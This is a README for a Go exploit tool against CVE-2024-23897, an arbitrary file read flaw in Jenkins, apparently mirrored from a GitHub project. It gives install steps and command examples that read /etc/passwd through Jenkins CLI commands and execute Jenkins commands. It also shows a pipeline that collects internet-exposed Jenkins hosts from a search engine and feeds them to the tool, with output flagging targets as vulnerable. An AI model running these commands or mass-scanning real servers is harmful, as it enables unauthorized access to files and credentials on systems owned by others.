Wjlin0 CVE 2024 23897 Save
CVE-2024-23897 - Jenkins 任意文件读取 利用工具
Project README
CVE-2024-23897 - Jenkins 任意文件读取 利用工具
安装
CVE-2024-23897 需要go 1.21才能完成安装 执行以下命令
go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
或者 安装完成的二进制文件在release中下载
使用
CVE-2024-23897 -help
CVE-2024-23897 is a tool for scanning for CVE-2024-23897
Usage:
CVE-2024-23897 [flags]
Flags:
INPUT:
-url, -u string[] URL to scan. (e.g. -u https://example.com)
-list string[] File containing list of URLs to scan. (e.g. -list list.txt)
CONFIG:
-c, -command string[] JinKens Command to run. (e.g. -c 'who-am-i')
-a, -args string[] JinKens Command args.
-e, -exec JinKens Execute command.
-lac, -list-available-commands List available commands.
OUTPUT:
-no-color Don't Use colors in output
DEBUG:
-debug Enable debugging
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-version show version of CVE-2024-23897 tool
-header string[] Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or -header header.txt)
-no-stdin disable stdin processing
LIMIT:
-timeout int time to wait in seconds before timeout (default 10)
-t, -thread int Number of concurrent threads (default 30)
-rl, -rate-limit int Rate limit for enumeration speed (n req/sec) (default -1)
UPDATE:
-update Update tool
-duc, -disable-update-check Disable update check
Examples:
Run CVE-2024-23897 check vulnerability on a single targets
$ CVE-2024-23897 -url https://example.com
Run CVE-2024-23897 check vulnerability on list of targets
$ CVE-2024-23897 -list list.txt
Run CVE-2024-23897 read full file contents on a single targets
$ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd
Run CVE-2024-23897 read available commands on a single targets
$ CVE-2024-23897 -url https://example.com -lac
Run CVE-2024-23897 execute the JenKings command
$ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec
Run CVE-2024-23897 check vulnerability on a single targets by proxy server
$ CVE-2024-23897 -url https://example.com -proxy http://127.0.0.1:7890
Run CVE-2024-23897 on uncovering Jenkins check vulnerability
$ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
use pathScan to collect targets and pass them to CVE-2024-23897 via standard input
pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
To protect your privacy, I have deleted some outputs
➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
_______ ________ ___ ____ ___ __ __ ___ _____ ____ ____ _____
/ ____| | / / ____/ |__ \/ __ |__ \/ // / |__ \|__ /( __ )/ __ /__ /
/ / | | / / __/________/ / / / __/ / // /_________/ / /_ </ __ / /_/ / / /
/ /___ | |/ / /__/_____/ __/ /_/ / __/__ __/_____/ __/___/ / /_/ /\__, / / /
\____/ |___/_____/ /____\____/____/ /_/ /____/____/\____//____/ /_/
Jenkins 任意文件读取漏洞
wjlin0.com
慎用。你要为自己的行为负责
开发者不承担任何责任,也不对任何误用或损坏负责.
[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests
漏洞分析
If you want to learn more about the vulnerability details, you can check out phith0n analysis of this vulnerability.
Open Source Agenda is not affiliated with "Wjlin0 CVE 2024 23897" Project. README Source: wjlin0/CVE-2024-23897
Stars
54
Open Issues
0
Last Commit
2 months ago
Repository
License
Tags
Open Source Agenda Badge
